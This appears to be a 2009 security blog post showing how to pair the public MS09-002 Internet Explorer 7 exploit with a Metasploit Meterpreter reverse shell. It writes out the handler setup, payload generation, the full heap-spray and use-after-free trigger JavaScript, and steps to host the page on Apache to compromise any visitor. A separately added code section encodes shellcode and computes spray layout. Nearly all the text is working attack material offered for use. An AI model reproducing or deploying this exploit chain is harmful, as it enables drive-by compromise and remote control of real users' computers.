MS09-002 Exploit 

If you were at ShmooCon, you may have heard the following phrase a few times: "Let's pop a box".

Okay, sure, why not. A recent IE vulnerability (MS09-002, the February 2009 cumulative IE update; the exploited bug affects IE7) was released with a public exploit on milw0rm. Below is how to wire that exploit up to a Metasploit Meterpreter payload instead of the shellcode it ships with.

First, start Metasploit with a Meterpreter handler on the attack box, 192.168.1.50:

./msfconsole
use exploit/multi/handler
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 443
exploit -j
(Note: 192.168.1.50 is the attack system that will receive the connection back. `exploit -j` runs the handler as a background job, and `ExitOnSession false` keeps it listening after the first session arrives, so several victims can connect back to the same handler; `sessions -l` lists them.)

We will be attacking anyone who loads this page.

Initial setup:

echo '<html>  <script language="JavaScript">' > ms09-002.html

Now generate the Metasploit payload and append it to the page:

./msfpayload windows/meterpreter/reverse_tcp \
LHOST=192.168.1.50 \
LPORT=443 J | ./payloadproper.pl >> ms09-002.html

(`J` makes msfpayload emit the shellcode in JavaScript escape form. payloadproper.pl is a small helper of mine that is not included here; whatever you use in its place must write a line that defines the shellcode as the JavaScript string `c`, because the milw0rm code below sizes its heap spray from `c.length` and appends `c` to every sprayed block. The original exploit declares `c` itself; that declaration is what this step replaces.)

Append the milw0rm exploit, minus its own shellcode declaration, to the end of the file.

http://milw0rm.org/exploits/8077

echo '
// Heap spray: fill memory with ~1 MB blocks of 0x0C0C0C0C followed by the shellcode c.
var array = new Array();
var ls = 0x100000-(c.length*2+0x01020);
var b = unescape("%u0C0C%u0C0C");
while(b.length<ls/2) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;
for(j=0; j<0xC0; j++) {
    array[j] = lh + c;
}
CollectGarbage();
// Trigger: free a tbody via its clone, then reuse the freed object.
var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));
function ok() {
    o1=document.createElement("tbody");
    o1.click;
    var o2 = o1.cloneNode();
    o1.clearAttributes();
    o1=null; CollectGarbage();
    for(var x=0;x<a1.length;x++) a1[x].src=s1;
    o2.click;
}
</script><script>window.setTimeout("ok();",800);</script>
</html>' >> ms09-002.html
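Two pieces of the above are easy to get wrong when you swap in your own shellcode: the form of the string `c` that the page expects, and why the spray block size is computed the way it is. The following is an added example, not code from the original post or from the milw0rm exploit, that builds the `var c = unescape("...")` declaration from raw shellcode bytes (this is what I assume a payloadproper.pl-style helper has to produce) and reproduces the exploit's own spray arithmetic so the numbers can be inspected. The `landing()` model, which lays the 0xC0 blocks back to back at 0x100000 intervals from a chosen base, is an idealisation of the real heap and is labelled as such; `0x02000000` as a base is an arbitrary assumed value.

```javascript
// Added example (not part of the original post or the milw0rm exploit).
// Assumptions: a payloadproper.pl-style helper emits `var c = unescape("...")`;
// the 0x1020 constant in the exploit is treated as its author's allowance for
// JScript string/heap overhead so that each sprayed element is a ~1 MB allocation.

// Encode raw shellcode bytes in the %uXXXX form that unescape() turns into a
// JavaScript string: each byte pair becomes one 16-bit code unit, low byte
// first (little-endian). An odd trailing byte is padded with a NOP (0x90).
function toUnescapeString(bytes) {
  const b = Array.from(bytes);
  if (b.length % 2) b.push(0x90);
  let out = "";
  for (let i = 0; i < b.length; i += 2) {
    const unit = (b[i + 1] << 8) | b[i];
    out += "%u" + unit.toString(16).padStart(4, "0");
  }
  return out;
}

// The line that must precede the milw0rm code so that `c` exists.
function shellcodeDeclaration(bytes) {
  return 'var c = unescape("' + toUnescapeString(bytes) + '");';
}

// The exploit's spray arithmetic, using the same expressions as the page, but
// returning sizes instead of filling the heap. Each string char is 2 bytes.
function sprayGeometry(c) {
  const ls = 0x100000 - (c.length * 2 + 0x01020); // bytes of 0x0C0C0C0C slide
  let b = unescape("%u0C0C%u0C0C");
  while (b.length < ls / 2) b += b;               // doubling until long enough
  const lh = b.substring(0, ls / 2);              // exactly ls bytes of slide
  const block = lh + c;                           // one array element
  return {
    padBytes: lh.length * 2,                      // slide length in bytes
    shellcodeBytes: c.length * 2,
    blockBytes: block.length * 2,                 // 0x100000 - 0x1020
    blocks: 0xC0,
  };
}

// Idealised model: blocks laid out back to back from `base`, one per 0x100000.
// Real heap placement varies; that is why the exploit sprays 0xC0 of them.
// Reports whether `addr` (e.g. 0x0C0C0C0C) falls inside the spray and, if so,
// whether it hits the 0x0C0C0C0C slide (good) or the shellcode/overhead (bad).
function landing(geom, addr, base) {
  const end = base + geom.blocks * 0x100000;
  if (addr < base || addr >= end) return { inSpray: false };
  const rel = addr - base;
  const offset = rel % 0x100000;
  return {
    inSpray: true,
    blockIndex: Math.floor(rel / 0x100000),
    offset: offset,
    inSlide: offset < geom.padBytes,
  };
}

// Constructed sample: the first four bytes of a typical x86 stager, not a real payload.
const SAMPLE_SHELLCODE = [0xfc, 0xe8, 0x89, 0x00];
const decl = shellcodeDeclaration(SAMPLE_SHELLCODE);
const geom = sprayGeometry(unescape(toUnescapeString(SAMPLE_SHELLCODE)));
const hit = landing(geom, 0x0C0C0C0C, 0x02000000);
```

Run it in Node and you get `var c = unescape("%ue8fc%u0089");` for the sample bytes, a block of 0xFEFE0 bytes (1 MB less the 0x1020 allowance), and, under the idealised layout, 0x0C0C0C0C landing in block 0xA0 at offset 0x0C0C0C, well inside the slide. The point of the slide is exactly that: wherever in a block the corrupted pointer lands, execution runs through 0x0C0C0C0C (a harmless instruction pair on x86) until it reaches `c` at the end of the block.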
Time to start Apache and copy the attack page to the webroot.

sudo /etc/init.d/apache2 start
sudo cp ms09-002.html /var/www
sudo chmod 755 /var/www/ms09-002.html

(644 is enough for a static file; it only has to be readable by the Apache user.) Now get a client running a vulnerable IE7 to open ms09-002.html and watch the handler for the Meterpreter session. Enjoy!

See everyone in Orlando at Infosec World. More details to come later.

-Jabra


